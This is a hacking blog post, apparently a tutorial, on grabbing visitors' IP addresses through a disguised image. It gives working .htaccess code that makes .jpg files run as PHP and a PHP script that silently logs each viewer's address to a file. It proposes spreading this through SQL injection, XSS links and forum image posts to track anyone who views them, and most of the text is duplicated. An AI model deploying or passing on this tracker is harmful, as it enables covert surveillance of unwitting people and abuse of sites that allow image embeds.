Starting on the name of My god "Allah" the most beneficent the most merciful
Today i wokeup and saw a post on grabbing the IP using SQL injection. As per my interest i checked what it was, after reading it i came up with an idea to include some htaccess shit with the whole idea and BOOM!!! you ll get a kewl ip grabbing image.
In this tutorial we will learn how to grab ip using an image. The idea is to use .htaccess along with a php file and add .jpg files to php executable using htaccess. Here is the htaccess code which will add jpg as php executable.
POC: IP_List.txt the below image grabbed your ip when you visited this page.
So here we have our IP grabber ready to work. Now the next part is using it with SQLi to grab a person IP. I dont find any logical reason to send an injected link to a person to grab his ip when we can directly send a image. But still just to knowledge here is the link to get a person up using SQLi. It as simple as getting the image loaded into the browser. Now lets do the same using XSS. Here is the link to get the victim ip using XSS.
Now a very interesting usage with this trick. Actually many Forums allow us to inlude images in our post, so we can use this trick to grab the ip addresses of any one who visit that post.
Thanks for reading.
Happy Hacking
Today i wokeup and saw a post on grabbing the IP using SQL injection. As per my interest i checked what it was, after reading it i came up with an idea to include some htaccess shit with the whole idea and BOOM!!! you ll get a kewl ip grabbing image.
In this tutorial we will learn how to grab ip using an image. The idea is to use .htaccess along with a php file and add .jpg files to php executable using htaccess. Here is the htaccess code which will add jpg as php executable.
AddHandler application/x-httpd-php5 .jpg
<?php
$fh = fopen('ip_list.txt', 'a');
fwrite($fh, $_SERVER['REMOTE_ADDR']."\r\n");
fclose($fh);
$im = imagecreatefromjpeg("n00b.png");
header('Content-Type: image/jpeg');
imagejpeg($im);
imagedestroy($im);
?>
POC: IP_List.txt the below image grabbed your ip when you visited this page.
So here we have our IP grabber ready to work. Now the next part is using it with SQLi to grab a person IP. I dont find any logical reason to send an injected link to a person to grab his ip when we can directly send a image. But still just to knowledge here is the link to get a person up using SQLi. It as simple as getting the image loaded into the browser. Now lets do the same using XSS. Here is the link to get the victim ip using XSS.
Now a very interesting usage with this trick. Actually many Forums allow us to inlude images in our post, so we can use this trick to grab the ip addresses of any one who visit that post.
Thanks for reading.
Happy Hacking
Newer post
DIOS the SQL Injectors Weapon (Upgraded)
Older post